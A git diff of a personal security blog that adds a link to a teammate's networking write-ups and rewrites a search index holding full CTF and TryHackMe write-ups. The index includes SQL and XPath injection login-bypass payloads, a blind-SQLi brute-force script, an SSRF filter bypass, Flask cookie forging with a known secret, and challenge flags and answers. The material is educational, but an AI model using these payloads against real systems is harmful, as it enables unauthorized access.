diff --git a/index.xml b/index.xml
index 601c89c..f8b63a4 100644
--- a/index.xml
+++ b/index.xml
@@ -130,7 +130,10 @@ root@knightctf.com:d05fcd90ca236d294384abd00ca98a2d
 <p>I got stuck here , will update when the ctf ends. :)</p>
 <hr>
 <h3 id="networking">Networking</h3>
-<p>will add later</p>
+<p>For the networking challs check out my teammates writeups on them »></p>
+<h5 id="herehttpspl4int3xtgithubiopostsknight-ctf"><a class="link" href="https://pl4int3xt.github.io/posts/knight-ctf/"  target="_blank" rel="noopener"
+    >here</a></h5>
+<hr>
 </description>
         </item>
         <item>
diff --git a/p/knightctf_2024/index.html b/p/knightctf_2024/index.html
index 617f335..4b4172c 100644
--- a/p/knightctf_2024/index.html
+++ b/p/knightctf_2024/index.html
@@ -353,7 +353,11 @@ <h2 class="widget-title section-title">Table of contents</h2>
             <li><a href="#gain-access-2">Gain access 2</a></li>
           </ol>
         </li>
-        <li><a href="#networking">Networking</a></li>
+        <li><a href="#networking">Networking</a>
+          <ol>
+            <li></li>
+          </ol>
+        </li>
       </ol>
     </li>
   </ol>
@@ -545,7 +549,10 @@ <h4 id="gain-access-2">Gain access 2</h4>
 <p>I got stuck here , will update when the ctf ends. :)</p>
 <hr>
 <h3 id="networking">Networking</h3>
-<p>will add later</p>
+<p>For the networking challs check out my teammates writeups on them &raquo;&gt;</p>
+<h5 id="herehttpspl4int3xtgithubiopostsknight-ctf"><a class="link" href="https://pl4int3xt.github.io/posts/knight-ctf/"  target="_blank" rel="noopener"
+    >here</a></h5>
+<hr>
 
 </section>
 
diff --git a/post/index.xml b/post/index.xml
index 18d985c..80a814c 100644
--- a/post/index.xml
+++ b/post/index.xml
@@ -130,7 +130,10 @@ root@knightctf.com:d05fcd90ca236d294384abd00ca98a2d
 &lt;p&gt;I got stuck here , will update when the ctf ends. :)&lt;/p&gt;
 &lt;hr&gt;
 &lt;h3 id=&#34;networking&#34;&gt;Networking&lt;/h3&gt;
-&lt;p&gt;will add later&lt;/p&gt;
+&lt;p&gt;For the networking challs check out my teammates writeups on them &amp;raquo;&amp;gt;&lt;/p&gt;
+&lt;h5 id=&#34;herehttpspl4int3xtgithubiopostsknight-ctf&#34;&gt;&lt;a class=&#34;link&#34; href=&#34;https://pl4int3xt.github.io/posts/knight-ctf/&#34;  target=&#34;_blank&#34; rel=&#34;noopener&#34;
+    &gt;here&lt;/a&gt;&lt;/h5&gt;
+&lt;hr&gt;
 </description>
         </item>
         <item>
diff --git a/search/index.json b/search/index.json
index df650cc..10f857a 100644
--- a/search/index.json
+++ b/search/index.json
@@ -1 +1 @@
-[{"content":"Writeup for challenges in knightctf 2024\nweb kitty Tetanus is a serious, potentially life-threatening infection that can be transmitted by an animal bite.\nN:B: There is no need to do bruteforce.\nHere its obvious that it is sqli , login bypas to be precise\n1 2  payload: \u0026#34; or 1=1-- -   since it was in json we you had to excape the first double-quote\n README This challenge entailed bypass a 403 response to be able to read the flag. The methos to exploit this is by using special http headers. see here\nUsing burp intruder , we get the flag\n Gain access 1 For this challenge we are given a login page. It obvious the vuln is login bypass.\nInspecting the page source code we can see a comment with the root email \u0026ldquo;root@knightctf.com\u0026rdquo;\n1 2  payload : root@knightctf.com\u0026#39;-- -    Gain access 2 For this challnege we are also given a login page. Viewing the page source we can see a comment that indicated there is a path notesssssss.txt. Visiting it\u0026hellip;\n1 2 3  I\u0026#39;ve something for you. Think..... root@knightctf.com:d05fcd90ca236d294384abd00ca98a2d   The hash is md5 since it has a length of 32. Using this \u0026raquo; site we find the password as \u0026ldquo;letmein_kctf2024\u0026rdquo;\nLogging in we get a OTP verification page. It is vulnerable to sqli\n1 2  payload : anything\u0026#39; or 1=1-- -   We then get access to the dashboard\nI got stuck here , will update when the ctf ends. :)\n Networking will add later\n","date":"2024-01-20T22:14:59+03:00","permalink":"https://f0rk3b0mb.github.io/p/knightctf_2024/","title":"Knightctf_2024"},{"content":"Whats my password solve script category : web difficulty: easy\nVulnerability is error based blind sqli\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29  import requests import string import json url=\u0026#34;http://whats-my-password-web.chal.irisc.tf/api/login\u0026#34; #found_char=[\u0026#39;i\u0026#39;, \u0026#39;r\u0026#39;, \u0026#39;i\u0026#39;, \u0026#39;s\u0026#39;, \u0026#39;c\u0026#39;, \u0026#39;t\u0026#39;, \u0026#39;f\u0026#39;, \u0026#39;{\u0026#39;, \u0026#39;m\u0026#39;, \u0026#39;y\u0026#39;, \u0026#39;_\u0026#39;, \u0026#39;p\u0026#39;, \u0026#39;4\u0026#39;, \u0026#39;2\u0026#39;, \u0026#39;2\u0026#39;,\u0026#39;W\u0026#39;, \u0026#39;0\u0026#39;, \u0026#39;R\u0026#39;, \u0026#39;D\u0026#39;, \u0026#39;_\u0026#39;, \u0026#39;1\u0026#39;, \u0026#39;S\u0026#39;, \u0026#39;_\u0026#39;, \u0026#39;S\u0026#39;, \u0026#39;Q\u0026#39;, \u0026#39;l\u0026#39;, \u0026#39;1\u0026#39;,\u0026#39;}\u0026#39;] found_char=[] headers={\u0026#34;Content-Type\u0026#34;:\u0026#34;application/json\u0026#34;} def main(): for x in range(len(found_char),50): for i in string.printable[:-6]: username = \u0026#34;skat\u0026#34; password = f\u0026#34;\\\u0026#34;or 1=(IF(SUBSTR((SELECT password from users where username=\u0026#39;skat\u0026#39;),{x},1)=\u0026#39;{i}\u0026#39;, 1,2))-- -\u0026#34; data = {\u0026#34;username\u0026#34;: username, \u0026#34;password\u0026#34;: password} sdata=json.dumps(data) r=requests.post(url,data=sdata,headers=headers) if \u0026#34;root\u0026#34; in r.text: found_char.append(i) print(found_char) break main()   flag: irisctf{my_p422W0RD_1S_SQl1} ","date":"2024-01-06T18:29:32+03:00","image":"https://f0rk3b0mb.github.io/cover/iris.png","permalink":"https://f0rk3b0mb.github.io/p/irisctf_whats_my_password/","title":"Irisctf_whats_my_password"},{"content":"Thm Investigating with splunk This room is for pactice on the Jnuior Penetration tester path on TryHackMe \u0026raquo;\u0026gt; here\n How many events were collected and Ingested in the index main?  1 2 3  index=\u0026#34;main\u0026#34; ans: 12256   On one of the infected hosts, the adversary was successful in creating a backdoor user. What is the new username?  1 2 3 4  index=main EventID=\u0026#34;4720\u0026#34; ans: A1berto   On the same host, a registry key was also updated regarding the new backdoor user. What is the full path of that registry key?  1 2 3 4 5  index=main Hostname=\u0026#34;Micheal.Beaven\u0026#34; EventID=\u0026#34;12\u0026#34; A1berto ans : HKLM\\SAM\\SAM\\Domains\\Account\\Users\\Names\\A1berto   Examine the logs and identify the user that the adversary was trying to impersonate.  1 2 3 4 5 6 7  The attacker account is called A1berto the real account is Alberto with an \u0026#39;L\u0026#39; index=main (User section) ans : Alberto   What is the command used to add a backdoor user from a remote computer?  1 2 3 4 5 6  index=main EventID=\u0026#34;4688\u0026#34; ans: \u0026#34;C:\\windows\\System32\\Wbem\\WMIC.exe\u0026#34; /node:WORKSTATION6 process call create \u0026#34;net user /add A1berto paw0rd1\u0026#34;   How many times was the login attempt from the backdoor user observed during the investigation?  1 2 3 4 5 6 7 8  index=main EventID=\u0026#34;4624\u0026#34; \u0026lt;\u0026lt; succesful logon\u0026gt;\u0026gt; index=main EventID=\u0026#34;4625\u0026#34; \u0026lt;\u0026lt;unsuccesful logon\u0026gt;\u0026gt; both return no results ans : 0   What is the name of the infected host on which suspicious Powershell commands were executed?  1 2 3 4  index=main powershell ans : James.browne   PowerShell logging is enabled on this device. How many events were logged for the malicious PowerShell execution?  1 2 3 4  index=main EventID=\u0026#34;4103\u0026#34; ans: 79   An encoded Powershell script from the infected host initiated a web request. What is the full URL?  1 2 3 4 5 6 7 8  from question 7 check the first event base64 decode and use decode text utf-16le using cyberchef. The url is base64 encoded . Youll also have to defang the url ans: hxxp[://]10[.]10[.]10[.]5/news[.]php   ","date":"2023-12-03T11:56:27+03:00","image":"https://f0rk3b0mb.github.io/cover/thm.svg","permalink":"https://f0rk3b0mb.github.io/p/thm_splunk/","title":"Thm_splunk"},{"content":"Wazuh This is a writeup of Wazuh module on tryhackme. This is in the SOC Level 1 path. \u0026raquo; here ENjoy :)\nWazuh is an opensource XDR and SIEM service\nIntro 1 2 3 4 5 6 7 8 9 10 11 12 13 14  1. When was Wazuh released? 2015 2. What is the term that Wazuh calls a device that is being monitored for suspicious activity and potential security threats? agent 3. Lastly, what is the term for a device that is responsible for managing these devices? manager   Wazuh agents 1 2 3 4 5 6 7 8 9  1. How many agents does this Wazuh management server manage? 2 2. What are the status of the agents managed by this Wazuh management server? disconnected   Wazuh Vulnerability Assessment \u0026amp; Security Events 1 2 3 4  1. How many \u0026#34;Security Event\u0026#34; alerts have been generated by the agent \u0026#34;AGENT-001\u0026#34;? 196   Collecting Windows Logs with Wazuh 1 2 3 4 5 6 7 8 9  1. What is the name of the tool that we can use to monitor system events? sysmon 2. What standard application on Windows do these system events get recorded to? event viewer   Collecting Linux Logs with Wazuh 1 2 3 4  1. What is the full file path to the rules located on a Wazuh management server? /var/ossec/ruleset/rules   Auditing Commands on Linux with Wazuh 1 2 3 4 5 6 7 8 9 10  1. What application do we use on Linux to monitor events such as command execution? auditd 2. What is the full path \u0026amp; filename for where the aforementioned application stores rules? /etc/audit/ruled.d/audit.rules   Wazuh API 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20  1. What is the name of the standard Linux tool that we can use to make requests to the Wazuh management server? curl 2. What HTTP method would we use to retrieve information for a Wazuh management server API? GET 3. What HTTP method would we use to perform an action on a Wazuh management server API? PUT 4. Use the API console to find the Wazuh server\u0026#39;s version. v4.2.5   Generating Reports with Wazuh 1 2 3 4 5  1. Analyse the report. What is the name of the agent that has generated the most alerts? agent-001   ","date":"2023-11-25T08:48:38+03:00","image":"https://f0rk3b0mb.github.io/cover/thm.svg","permalink":"https://f0rk3b0mb.github.io/p/thm_wazuh/","title":"Thm_wazuh"},{"content":"Hackthebox - Hack the boo 2023 writeup  HauntMart Category: web Rating: Easy\nThis challenge had a downloadable part , it was a web applicatio that allowed a user to register and login and add a product.\nTo get the flag we have to login as admin.\nThe is a /addAdmin route but it only accepts requests from localhost\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15  @api.route(\u0026#39;/addAdmin\u0026#39;, methods=[\u0026#39;GET\u0026#39;]) @isFromLocalhost def addAdmin(): username = request.args.get(\u0026#39;username\u0026#39;) if not username: return response(\u0026#39;Invalid username\u0026#39;), 400 result = makeUserAdmin(username) if result: return response(\u0026#39;User updated!\u0026#39;) return response(\u0026#39;Invalid username\u0026#39;), 400   I Tries using X-Forwarded-For headers but it didnt work.\nIf you look closer at the code there is a function to send a request to fetch the manual from a url.\nThis vulnerability is called ssrf (server side request forgery) check more \u0026raquo;\u0026gt; here\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18  def downloadManual(url): safeUrl = isSafeUrl(url) if safeUrl: try: local_filename = url.split(\u0026#34;/\u0026#34;)[-1] r = requests.get(url) with open(f\u0026#34;/opt/manualFiles/{local_filename}\u0026#34;, \u0026#34;wb\u0026#34;) as f: for chunk in r.iter_content(chunk_size=1024): if chunk: f.write(chunk) return True except: return False return False   There is also a poor attempt of a filter for the url\n1 2 3 4 5 6 7 8 9 10  blocked_host = [\u0026#34;127.0.0.1\u0026#34;, \u0026#34;localhost\u0026#34;, \u0026#34;0.0.0.0\u0026#34;] def isSafeUrl(url): for hosts in blocked_host: if hosts in url: return False return True   We can easily bypass this , there are many routed to localhost other that the ones listed there. You can check them out \u0026raquo;\u0026gt; here\nFor me this one worked:\nNOTE: you can get the port that the app is listenig from in therun.py , we have to make a request to /api/addAdmin to make our user admin\n1 2 3 4  http://127.0.1.3:1337/api/addAdmin?username=test   We get the flag as : HTB{A11_55RF_5C4rY_p4tch_3m_411!}\n ","date":"2023-10-27T08:52:15+03:00","image":"https://f0rk3b0mb.github.io/cover/htb.svg","permalink":"https://f0rk3b0mb.github.io/p/hack_the_boo2023/","title":"Hack_the_boo2023"},{"content":"Thm owasp  Command Injection Practical 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40  What strange text file is in the website root directory? cmd: ls drpepper.txt How many non-root/non-service/non-daemon users are there? What user is this app running as? cmd: whoami www-data What is the user\u0026#39;s shell set as? What version of Ubuntu is running? cmd: lsb_release -a 18.04.4 Print out the MOTD. What favorite beverage is shown? cmd: cat /etc/update-motd.d/00-header DR PEPPER   Broken Authentication Practical 1 2 3 4 5 6 7 8 9 10 11 12 13 14  What is the flag that you found in darren\u0026#39;s account? fe86079416a21a3c99937fea8874b667 What is the flag that you found in arthur\u0026#39;s account? d9ac0f7db4fda460ac3edeb75d75e16e   Sensitive Data Exposure 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27  What is the name of the mentioned directory? /assets Navigate to the directory you found in question one. What file stands out as being likely to contain sensitive data? webapp.db Use the supporting material to access the sensitive data. What is the password hash of the admin user? 6eea9b7ef19179a06954edd0f6c05ceb Crack the hash. What is the admin\u0026#39;s plaintext password? qwertyuiop Login as the admin. What is the flag? THM{Yzc2YjdkMjE5N2VjMzNhOTE3NjdiMjdl}   XML External Entity 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19  What is the name of the user in /etc/passwd falcon Where is falcon\u0026#39;s SSH key located? /home/falcon/.ssh/id_rsa What are the first 18 characters for falcon\u0026#39;s private key MIIEogIBAAKCAQEA7b   Broken Access Control (IDOR Challenge) 1 2 3 4 5 6 7 8 9 10 11 12  Look at other users notes. What is the flag? payload : http://10.10.145.127/note.php?note=0 flag{fivefourthree}   Security Misconfiguration 1 2 3 4 5 6 7 8 9 10  Hack into the webapp, and find the flag! creds: pensive:PensiveNotes thm{4b9513968fd564a87b28aa1f9d672e17}   XSS 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24  Navigate to http://10.10.98.36/ in your browser and click on the \u0026#34;Reflected XSS\u0026#34; tab on the navbar; craft a reflected XSS payload that will cause a popup saying \u0026#34;Hello\u0026#34;. ThereIsMoreToXSSThanYouThink On the same reflective page, craft a reflected XSS payload that will cause a popup with your machines IP address. ReflectiveXss4TheWin Then add a comment and see if you can insert some of your own HTML. HTML_T4gs On the same page, create an alert popup box appear on the page with your document cookies. W3LL_D0N3_LVL2 Change \u0026#34;XSS Playground\u0026#34; to \u0026#34;I am a hacker\u0026#34; by adding a comment and using Javascript. websites_can_be_easily_defaced_with_xss   Insecure Deserialization 1 2 3 4 5 6 7 8 9 10 11  Who developed the Tomcat application? The Apache Software Foundation What type of attack that crashes services can be performed with insecure deserialization? denial of service   Insecure Desirialization 1 2 3 4 5 6 7 8 9 10 11 12  1st flag (cookie value) THM{good_old_base64_huh} 2nd flag (admin dashboard) THM{heres_the_admin_flag}   Insecure Deserialization - Code Execution 1 2 3 4 5 6 7  flag.txt 4a69a7ff9fd68   Components with know vulns 1 2 3 4 5 6 7 8 9  How many characters are in /etc/passwd (use wc -c /etc/passwd to get the answer) exploit : https://www.exploit-db.com/exploits/47887 1611   Insufficient Logging and Monitoring 1 2 3 4 5 6 7 8 9 10 11  What IP address is the attacker using? 49.99.13.16 What kind of attack is being carried out? brute force   ","date":"2023-10-25T13:12:22+03:00","image":"https://f0rk3b0mb.github.io/cover/thm.svg","permalink":"https://f0rk3b0mb.github.io/p/thm_owasp/","title":"Thm_owasp"},{"content":"Blackhat Mea 2023 ctf writeup We participated this ctf as Chasing X fr334aks X L3v3l 6 and managed to get pos 178. It wasn\u0026rsquo;t easy. I Managed to solve the web challenge below.\nAuthy For this challenge we are provided with an api endpoint and challenge source\nAccording to the LoginController.go file we can create a user and login , the user password length should not be less than 6\nThe vulnerability occurs when the user passowrd value in the registration function is not the one being compared in the login function. To get the flag we have to login with a password of length \u0026lt; 6.\nThe vulnerable code:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23  //registration  if len(user.Password) \u0026lt; 6 { log.Error(\u0026#34;Password too short\u0026#34;) resp := c.JSON(http.StatusConflict, helper.ErrorLog(http.StatusConflict, \u0026#34;Password too short\u0026#34;, \u0026#34;EXT_REF\u0026#34;)) return resp } //login  if len(password) \u0026lt; 6 { flag := os.Getenv(\u0026#34;FLAG\u0026#34;) res := \u0026amp;Flag{ Flag: flag, } resp := c.JSON(http.StatusOK, res) log.Info() return resp }   With my vast ctf experience i could tell what i needed to do :)\nTHe logic is :\n1 2 3 4 5 6  user.Name := \u0026#34;😃\u0026#34; // Contains 1 emoji character  lengthOfString := len(user.Name) // Length of the string (bytes) - 4 (UTF-8 encoding) lengthOfRuneSlice := len([]rune(user.Name)) // Length of rune slice (code points) - 1    So i sent the request for registration with the password as two smileys and login with the same password. In the backend the register will see a length of 8 and login will see a length of 2 thus solving the challenge\n1 2 3 4 5 6 7  curl -X POST -H \u0026#34;Content-Type: application/json\u0026#34; -d \u0026#39;{\u0026#34;Username\u0026#34;: \u0026#34;ping\u0026#34;, \u0026#34;Password\u0026#34;: \u0026#34;🤣🤣\u0026#34;, \u0026#34;Firstname\u0026#34;: \u0026#34;John\u0026#34;, \u0026#34;Lastname\u0026#34;: \u0026#34;Doe\u0026#34;}\u0026#39; http://af78671fe39ff1e0e18d2.playat.flagyard.com/registration curl -X POST -H \u0026#34;Content-Type: application/json\u0026#34; -d \u0026#39;{\u0026#34;Username\u0026#34;: \u0026#34;ping\u0026#34;, \u0026#34;Password\u0026#34;: \u0026#34;🤣🤣\u0026#34;}\u0026#39; http://af78671fe39ff1e0e18d2.playat.flagyard.com/login    The ctf was great and see you in the next one\n","date":"2023-10-09T16:06:15+03:00","image":"https://f0rk3b0mb.github.io/cover/bh.png","permalink":"https://f0rk3b0mb.github.io/p/blackhat_mea_2023/","title":"Blackhat_mea_2023"},{"content":"Shehacks intervasity ctf 2023 This ctf onsite at usiu , nairobi . I particpated online.\n web category\n Graph1 This was an easy chalenge that tested knowledge in graphql queries\nthe graphql endpoint was located at /graphql.\nfor more info on how to enumerate graphql \u0026raquo; here\nSo basicaly if we send the query below we get introspection on the grapql endpoint\n1 2  {__schema{types{name,fields{name}}}}   You can then use \u0026raquo; here to visualize the schema\nremember to set the content-type to \u0026ldquo;appication/graphql\u0026rdquo; when sending the request\nFrom this we find out that there is a field known as getFlag. We can then run the query below to get the flag . It was base64 encoded , so we decode it to get the flag\n X marks the spot In this challenge we are given a web application login field , i tried sql injection at first an an error was thrown\n1  SimpleXMLElement::xpath(): Invalid predicate in \u0026lt;b\u0026gt;/var/www/html/backend.php   This indicated that the appication is vulnerable to xpath injection\nyou can check the payloads \u0026raquo; hacktricks xpath\ni tried the payload\n1 2  \u0026#39;or 1=1 or\u0026#39;   this is able to bypass login and i get the result\n1 2  {\u0026#34;username\u0026#34;:\u0026#34;admin\u0026#34;,\u0026#34;password\u0026#34;:\u0026#34;supersecret\u0026#34;,\u0026#34;api-key\u0026#34;:\u0026#34;api-admin-key\u0026#34;}   to move laterally through accounts i used the following payload , i achieved this after after trying lots of payloads\n1 2  \u0026#39;or position()=3 or\u0026#39;   by changing the number above we can basically login as different users , in this case 3 gets us the flag.\nPS i got first blood on this challenge :)\n1 2  {\u0026#34;username\u0026#34;:\u0026#34;ali\u0026#34;,\u0026#34;password\u0026#34;:\u0026#34;654321\u0026#34;,\u0026#34;api-key\u0026#34;:\u0026#34;flag{s0m30n3_n33ds_1npu7_v4l1d4t10n}\u0026#34;}    secrets For this challenge you are provided with a signin page and you can also register.\nWe have to manipulate the cookie to become the admin user. For this i used the tool flask-unsign , you can get it \u0026raquo; here\n1 2 3 4  flask-unsign --decode --cookie \u0026#34;.eJwljkFOBDEMBP-SM4fYjuN4PzOKYxtWiAHN7J4Qf2cQx26pSvVdtjzifCu3x_GMl7LdvdwKyJKcbQnKyJARCmralZw6kPrsiDrYxnSBmQ0SclBMrk5cRyUF55qcuRb2RSbDZGkjTsLBfXpQY21iyd2hUiYahseQBp2tXCHPM47_GuJrr_PI7fH5Hvv1rOE4Wpi4IjjMqmJx1UX1XqtPNKsa2C7uT7PPj7ior_v-Wn5-AZmVRW0.ZQ5wGQ.2gLkeklbQ2OS2GBjMTAi2uiVKWI\u0026#34; {\u0026#39;_fresh\u0026#39;: True, \u0026#39;_id\u0026#39;: \u0026#39;17c7fa4c7278fe78e919b9693d36139da622985b8ad71af41f1f83ea50d35080391d50f5ffcc26c3b78b7c9435f32856ade345947bf56d103ff2b2ede874165b\u0026#39;, \u0026#39;_user_id\u0026#39;: \u0026#39;35\u0026#39;, \u0026#39;csrf_token\u0026#39;: \u0026#39;c8d284eb7d921d1a097be93de0d600da2bb09e24\u0026#39;, \u0026#39;username\u0026#39;: \u0026#39;ping\u0026#39;}   We then have to change the uid to 1 and username to admin and then sign the cookie with secretkey \u0026lsquo;SheHacks\u0026rsquo;\n1 2 3 4 5 6  flask-unsign --sign --cookie \u0026#34;{ \u0026#39;_user_id\u0026#39;: \u0026#39;1\u0026#39;, \u0026#39;username\u0026#39;: \u0026#39;admin\u0026#39;}\u0026#34; --secret \u0026#39;SheHacks\u0026#39; eyJfdXNlcl9pZCI6IjEiLCJ1c2VybmFtZSI6ImFkbWluIn0.ZQ59CA.CUKCpa3SPstLemcqmuEDrSqmpFI   Using this cookie we can get the flag : flag{s3c3ts_4re_n0_l0ng3r_s4f3}\n forensics category\n SnifferDog1 How many packets in total passed through port 445 shctf{Ans}\nFor this we just use the filter \u0026ldquo;tcp.port == 445\u0026rdquo; then check the bottom right of wireshrk for number of packets shctf{10223}\n Sniffer Dog2 What is the 6th disallowed item listed in http://192.168.56.103:8081/robots.txt?\nFor this we just use the filter \u0026ldquo;ip.addr == 192.168.56.103 \u0026amp;\u0026amp; tcp.port == 8081 \u0026amp;\u0026amp; http\u0026rdquo; then find \u0026ldquo;robots.txt\u0026rdquo;\nshctf{installation}\n SnifferDog3 What version of Jenkins is running on 192.168.56.103? shctf{VersionOnly}\nFor this we just use the filter \u0026ldquo;ip.addr == 192.168.56.103\u0026rdquo; then find \u0026ldquo;jenkins\u0026rdquo;\nshctf{1.647}\n SnifferDog4 What is the domain SID for 192.168.56.103 shctf{S\u0026hellip;}\nFor this we just use the filter \u0026ldquo;ip.addr == 192.168.56.103\u0026rdquo; then find \u0026ldquo;S-1-5\u0026rdquo; this is the format for sid you can learn more \u0026raquo; here\nshctf{S-1-5-21-2950693484-2233299975-203034155}\n ","date":"2023-09-22T14:29:32+03:00","image":"https://f0rk3b0mb.github.io/cover/shehacks.png","permalink":"https://f0rk3b0mb.github.io/p/shehacks_intrervasity_2023/","title":"Shehacks_intrervasity_2023"},{"content":"Windows event log analysis is an important skill in threat hunting. These logs silently record system events, security incidents, and user interactions, providing crucial insights into system health and security. In this blog, we will explore the art of Windows Event Log analysis\nIm going to discuss log analysis of windows events in linux, we will be utilizing a tool called chainsaw, you can get it \u0026raquo; here.\nIn this tutorial i will be analysing the files from cybertalents blue scholarship.\n 1. chainsaw search an attacker after compromising the machine added a new account as admin. can you find the name of the new account? flag format : flag{md5 of string}\nfile \u0026raquo;\u0026raquo; ex1\nIn windows, each event has a unique event id. So we have to find event id for account creation , a quick google search\nThen in chainsaw\n1 2 3  ./chainsaw/chainsaw-gnu search -t \u0026#39;Event.System.EventID: =4720\u0026#39; Security436509324654726509.evtx   Here we can filter events with the event id 4720.\nSAM means security account manager , it is a database that stores accounts on windows systems. Usename is sam md5hash ba0e0cde1bf72c28d435c89a66afc61a.\nflag{ba0e0cde1bf72c28d435c89a66afc61a}\n 2. chainsaw hunt file \u0026raquo;\u0026raquo; here\n1 2 3 4 5 6 7  Our network got compromised two days ago by an unknown attacker, and we need to get an answer for the following questions: 1. What is the domain\u0026#39;s SID? 2. The attacker failed to login to some accounts, What is the attacker\u0026#39;s machine IP address? 3. What is the workstation\u0026#39;s name that the attacker was using to authenticate with the administrator account? Flag format: Flag{ANS1_ANS2_ANS3}   Since this is account failed login it has event id 4776 for failed login from domain controller. The domain controller in this case is HYDRA-DC.MARVEL.local.\nSince chainsaw has rules to detect certain events , you can use the folowing command to hunt for events\n1 2 3  ./chainsaw/chainsaw-gnu hunt -r ./chainsaw/rules/ logs.evtx   This returns alot of output , but retuns events in a format we can easily comprehend.\n1 2 3  ./chainsaw/chainsaw-gnu hunt --sigma ./chainsaw/sigma/ --mapping ./chainsaw/mappings/sigma-event-logs-all.yml -r ./chainsaw/rules/lateral_movement/ logs/   You can use the command above to get more info. Now here is where the fun begins.\nFrom the logs we can see that there are several users lke pbarker,fcasle, Administrator and these avents are have a common ipaddress \u0026ldquo;192.168.80.128\u0026rdquo;\nIf we search for the following users in the sigma output , we can find the sid\npbarker : S-1-5-21-271597537-2992796785-3713134209-1105\nfcastle: S-1-5-21-271597537-2992796785-3713134209-1103\nAdminitrator : S-1-5-21-271597537-2992796785-3713134209-500\nThe structure of an sid is as follows :\nS-1-5-21--\u0026lt;relative_id\u0026gt;\nWhere:\nS: A constant prefix indicating that it is a Security Identifier.\n1: Revision number (currently always 1).\n5: Identifier authority value (the identifier authority for Windows is always 5).\n21: The identifier authority\u0026rsquo;s top-level domain identifier. The actual number may vary depending on the Windows version or configuration but is typically 21 for Windows domains.\n: The SID for the domain. It is a unique value assigned to each domain by the domain controller during domain creation.\n\u0026lt;relative_id\u0026gt;: A relative identifier that uniquely identifies a specific security principal within the domain. For users and groups, this relative ID is usually the RID (Relative Identifier) assigned by the domain controller.\nso in this case domain sid is \u0026ldquo;S-1-5-21-271597537-2992796785-3713134209\u0026rdquo;\nTo get the workstation you can ue the command we used earlier to filter events using event id\n1 2 3  ./chainsaw/chainsaw-gnu search -t \u0026#39;Event.System.EventID: =4776\u0026#39; logs/ | grep -i workstation   workstation: THEPUNISHER\nflag is Flag{S-1-5-21-271597537-2992796785-3713134209_192.168.80.128_THEPUNISHER}\n","date":"2023-07-31T16:18:16+03:00","image":"https://f0rk3b0mb.github.io/cover/4020769.jpg","permalink":"https://f0rk3b0mb.github.io/p/windows-events-and-log-analysis/","title":"Windows events and log analysis"},{"content":"ImaginaryCTF Imaginaryctf web writeups  Idoriot This web challenge was very simple , while registering a new user you could set their id , so just set user_id as 0 and login to get the flag.\n Idoriot revenge This challenge is related to the first one but we can set the user id as a parameter , in the source , there is this filter\n1 2 3 4 5 6 7 8 9 10 11 12  if (isset($_GET[\u0026#39;user_id\u0026#39;])) { $user_id = (int) $_GET[\u0026#39;user_id\u0026#39;]; // Check if the user is admin  if ($user_id == \u0026#34;php\u0026#34; \u0026amp;\u0026amp; preg_match(\u0026#34;/\u0026#34;.$admin[\u0026#39;username\u0026#39;].\u0026#34;/\u0026#34;, $_SESSION[\u0026#39;username\u0026#39;])) { // Read the flag from flag.txt  $flag = file_get_contents(\u0026#39;/flag.txt\u0026#39;); echo \u0026#34;\u0026lt;h1\u0026gt;Flag\u0026lt;/h1\u0026gt;\u0026#34;; echo \u0026#34;\u0026lt;p\u0026gt;$flag\u0026lt;/p\u0026gt;\u0026#34;; } }   it checks if the user_id is equal to \u0026ldquo;php\u0026rdquo; and if the username contains \u0026ldquo;admin\u0026rdquo;.\nThis is classic php type juggling read more \u0026raquo; here there is also a chart on the pdf showing what will be regerded as True or False in php, in this case if i set user_id=0 it will be equal to \u0026ldquo;php\u0026rdquo;. For the username , register any user with a username that contains \u0026ldquo;admin\u0026rdquo; but not \u0026ldquo;admin\u0026rdquo; like eg (admino) to satisfy the regex check.\n Blank This challenge tested knowledge is sql.\n1 2 3  db.get(\u0026#39;SELECT * FROM users WHERE username = \u0026#34;\u0026#39; + username + \u0026#39;\u0026#34; and password = \u0026#34;\u0026#39; + password+ \u0026#39;\u0026#34;\u0026#39;, (err, row) =\u0026gt; {   as you can see , user input is directly added to the sql statement which is very dangerous. Also the application was not checking the password.\n1 2 3 4 5  app.get(\u0026#39;/flag\u0026#39;, (req, res) =\u0026gt; { if (req.session.username == \u0026#34;admin\u0026#34;) { res.send(\u0026#39;Welcome admin. The flag is \u0026#39; + fs.readFileSync(\u0026#39;flag.txt\u0026#39;, \u0026#39;utf8\u0026#39;)); }   THe username had to be \u0026ldquo;admin\u0026rdquo;. so we can only inject via password field\nThis will satisfy this part of the code and return rows\n1 2 3 4 5  if (row) { console.log(row,req.session.username); req.session.loggedIn = true; req.session.username = username; res.send(\u0026#39;Login successful!\u0026#39;);    Perfect picture This challenge required uploading a picture with specific characterictics\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28  def check(uploaded_image): with open(\u0026#39;flag.txt\u0026#39;, \u0026#39;r\u0026#39;) as f: flag = f.read() with Image.open(app.config[\u0026#39;UPLOAD_FOLDER\u0026#39;] + uploaded_image) as image: w, h = image.size if w != 690 or h != 420: return 0 if image.getpixel((412, 309)) != (52, 146, 235, 123): return 0 if image.getpixel((12, 209)) != (42, 16, 125, 231): return 0 if image.getpixel((264, 143)) != (122, 136, 25, 213): return 0 with exiftool.ExifToolHelper() as et: metadata = et.get_metadata(app.config[\u0026#39;UPLOAD_FOLDER\u0026#39;] + uploaded_image)[0] try: if metadata[\u0026#34;PNG:Description\u0026#34;] != \u0026#34;jctf{not_the_flag}\u0026#34;: return 0 if metadata[\u0026#34;PNG:Title\u0026#34;] != \u0026#34;kool_pic\u0026#34;: return 0 if metadata[\u0026#34;PNG:Author\u0026#34;] != \u0026#34;anon\u0026#34;: return 0 except: return 0 return flag   to satisfy those i wrote a python script\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19  from PIL import Image def create_and_modify_image(): # Step 1: Create the Image width, height = 